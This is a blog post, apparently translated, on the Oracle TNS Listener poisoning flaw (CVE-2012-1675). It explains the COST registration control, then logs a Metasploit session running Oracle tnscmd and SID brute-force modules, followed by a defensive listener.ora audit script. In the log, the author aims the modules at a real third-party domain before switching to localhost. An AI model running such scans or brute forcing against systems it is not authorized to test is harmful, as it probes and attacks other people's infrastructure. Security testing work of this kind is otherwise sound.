Oracle TNS Listener Remote Poisoning Test

2024-04-02 19:04:59 · 921 views · 泡泡鱼

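  1. Remote data poisoning vulnerability (CVE-2012-1675)
    This vulnerability allows an attacker, without supplying a username or password, to poison the data handled by the remote "TNS Listener" component.
    COST stands for Class of Secure Transports. It is a security control mechanism for instance registration: for a given listener, it restricts which instances may register and over which protocols. This prevents other remote instances from registering maliciously, along with the resulting risks such as information disclosure.
    It is implemented by setting the parameter SECURE_REGISTER_listener_name in listener.ora to a transport list (the list of protocols permitted for registration, such as IPC, TCP, TCPS). The feature is supported from version 10.2.0.3 onward (although the 10g R2 online documentation does not state this explicitly) and remains available in 11.2.0.4 and later. After 11.2.0.4, however, Oracle recommends using the default VNCR configuration.

  2. Impact
    The main impact is that an attacker can create a database with the same name as the current production database and register it with the production database's listener.
    User connections are then routed to the instance the attacker created, interrupting the business service.
    Applications report ORA-12545: Connect failed because target host or object does not exist
  3. Affected versions
    Although the security alert describes the issue as starting from 10203, in practice every version from 8i onward is affected.
  4. My verification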

[root@204_maridb ~]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5532 100 5532 0 0 6758 0 --:--:-- --:--:-- --:--:-- 6754
Checking for and installing update..
Adding metasploit-framework to your repository list..
已加载插件:fastestmirror
Repository base is listed more than once in the configuration
Repository updates is listed more than once in the configuration
Repository extras is listed more than once in the configuration
Repository centosplus is listed more than once in the configuration
metasploit | 2.9 kB 00:00:00
metasploit/primary_db | 9.8 kB 00:00:00
Loading mirror speeds from cached hostfile
 * epel: mirrors.tuna.tsinghua.edu.cn
正在解决依赖关系
--> 正在检查事务
---> 软件包 metasploit-framework.x86_64.0.5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 将被 安装
--> 解决依赖关系完成

依赖关系解决

========================================================================================================================================================================================================
Package 架构 版本 源 大小

正在安装:
metasploit-framework x86_64 5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 metasploit 195 M

事务概要

安装 1 软件包

总下载量:195 M
安装大小:433 M
Downloading packages:
警告:/var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: 头V4 RSA/SHA256 Signature, 密钥 ID 2007b954: NOKEYMB 00:00:00 ETA
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm 的公钥尚未安装
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07
从 file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 检索密钥
导入 GPG key 0x2007B954:
用户ID : "Metasploit <metasploit@rapid7.com>"
指纹 : 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954
来自 : /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
正在安装 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1
Run msfconsole to get started
验证中 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

已安装:
metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

完毕!
[root@204_maridb ~]# ms
msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msgcmp msgconv msgexec msgfmt msghack msgmerge msguniq
msfconsole msfdb msfmachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2mysql
[root@204_maridb ~]# msfconsole
-bash: /usr/local/bin/msfconsole: 没有那个文件或目录
[root@204_maridb ~]# which msfconsole
/usr/bin/msfconsole
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]


       =[ metasploit v5.0.19-dev-                         ]
+ -- --=[ 1880 exploits - 1062 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > info

   Name: Oracle TNS Listener Command Issuer
 Module: auxiliary/admin/oracle/tnscmd
License: Metasploit Framework License (BSD)
   Rank: Normal

Disclosed: 2009-02-01

Provided by:
MC <mc@metasploit.com>

Check supported:
No

Basic options:
   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS                                    yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS  www.xxxx.cc                       yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[-] Auxiliary failed: option RHOSTS failed to validate.
msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS  www.baidu.com                     yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[*] Running module against 61.135.169.125
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Running module against 61.135.169.121
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

   Name     Current Setting                                                      Required  Description
   ----     ---------------                                                      --------  -----------
   RHOSTS                                                                        yes       The target address range or CIDR identifier
   RPORT    1521                                                                 yes       The target port (TCP)
   SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
   SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

   Name     Current Setting                                                      Required  Description
   ----     ---------------                                                      --------  -----------
   RHOSTS   www.baidu.com                                                        yes       The target address range or CIDR identifier
   RPORT    1521                                                                 yes       The target port (TCP)
   SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
   SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 61.135.169.121
[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Running module against 61.135.169.125
[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[-] 127.0.0.1:1521 - The connection was refused by the remote host (127.0.0.1:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > exit
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]


       =[ metasploit v5.0.19-dev-                         ]
+ -- --=[ 1880 exploits - 1062 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS                                    yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
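
An added example, not from the original article: a small Python audit that reads a listener.ora and reports, per listener, whether instance registration is restricted by the SECURE_REGISTER_listener_name (COST) parameter described in section 1 or by VNCR. The parameter name VALID_NODE_CHECKING_REGISTRATION_listener_name is Oracle's listener.ora setting for VNCR and does not appear on the page; the sample file, hostnames, listener names and status labels are constructed.

```python
import re

# Constructed sample listener.ora (hostnames and listener names are placeholders).
SAMPLE = """\
LISTENER =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521)))
LISTENER_APP =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1522))
    (ADDRESS = (PROTOCOL = IPC)(KEY = REGISTER)))
SECURE_REGISTER_LISTENER_APP = (IPC)   # COST: registration over IPC only
LISTENER_OLD =
  (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1523))
SECURE_REGISTER_LISTENER_OLD = (TCP, IPC)
"""

def parse_top_level(text):
    """Map each column-0 parameter name (upper-cased) to its raw value text."""
    params, name = {}, None
    for line in text.splitlines():
        line = line.split("#", 1)[0].rstrip()        # strip comments
        m = re.match(r"([A-Za-z_][\w.]*)\s*=(.*)", line)
        if m:                                        # a new parameter starts at column 0
            name = m.group(1).upper()
            params[name] = m.group(2)
        elif name and line.strip():                  # indented continuation of the value
            params[name] += " " + line.strip()
    return params

def audit(text):
    """Return {listener: status} describing how instance registration is restricted."""
    params = parse_top_level(text)
    report = {}
    for name, value in params.items():
        if not re.search(r"\(\s*ADDRESS\s*=", value, re.I):
            continue                                 # not a listener definition
        cost = params.get("SECURE_REGISTER_" + name)
        vncr = params.get("VALID_NODE_CHECKING_REGISTRATION_" + name, "").strip().upper()
        if cost is not None:
            transports = set(re.findall(r"[A-Z]+", cost.upper()))
            # Plain TCP in the list still lets any host that reaches the port register.
            report[name] = "cost-allows-tcp" if "TCP" in transports else "cost-restricted"
        elif vncr in {"ON", "1", "LOCAL", "SUBNET", "2"}:
            report[name] = "vncr-restricted"
        else:
            report[name] = "no-explicit-restriction"
    return report

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A `no-explicit-restriction` result means only that the file sets neither parameter; on releases where VNCR is enabled by default, registration may still be restricted, so confirm against the installed version.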
